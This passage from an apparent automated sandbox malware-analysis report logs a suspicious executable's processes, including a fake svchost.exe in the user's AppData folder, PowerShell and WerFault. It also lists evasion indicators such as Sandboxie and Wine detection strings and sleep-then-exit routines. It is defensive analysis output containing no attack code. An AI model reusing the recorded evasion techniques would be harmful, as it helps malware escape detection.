              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Windows\System32\WerFault.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX
              Source: C:\Users\user\AppData\Roaming\svchost.exeProcess information set: NOOPENFILEERRORBOX

              Malware Analysis System Evasion

              barindex
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7964, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 8048, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 1072, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: svchost.exe PID: 7920, type: MEMORYSTR
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeCode function: 13_2_0040E18D Sleep,ExitProcess,13_2_0040E18D
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\ngen.exeCode function: 19_2_0040E18D Sleep,ExitProcess,19_2_0040E18D
              Source: C:\Program Files (x86)\Windows Media Player\wmplayer.exeCode function: 29_2_0040E18D Sleep,ExitProcess,29_2_0040E18D
              Source: LisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.0000021425A97000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.000002142576F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1563081980.000001389A606000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1523488725.0000013F3F317000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.1538118774.0000020A35606000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: WINE_GET_UNIX_FILE_NAME
              Source: LisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.0000021425A97000.00000004.00000800.00020000.00000000.sdmp, LisectAVT_2403002A_136.exe, 00000000.00000002.1359537990.000002142576F000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000009.00000002.1563081980.000001389A606000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 0000000C.00000002.1523488725.0000013F3F317000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000018.00000002.1538118774.0000020A35606000.00000004.00000800.00020000.00000000.sdmp, svchost.exe, 00000027.00000002.1613047804.000001C217577000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: SBIEDLL.DLL
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeMemory allocated: 21423D00000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\Desktop\LisectAVT_2403002A_136.exeMemory allocated: 2143D720000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 13898B70000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 138B25A0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 13F3D4E0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 13F56FA0000 memory reserve | memory write watchJump to behavior
              Source: C:\Users\user\AppData\Roaming\svchost.exeMemory allocated: 20A33B30000 memory reserve | memory write watch
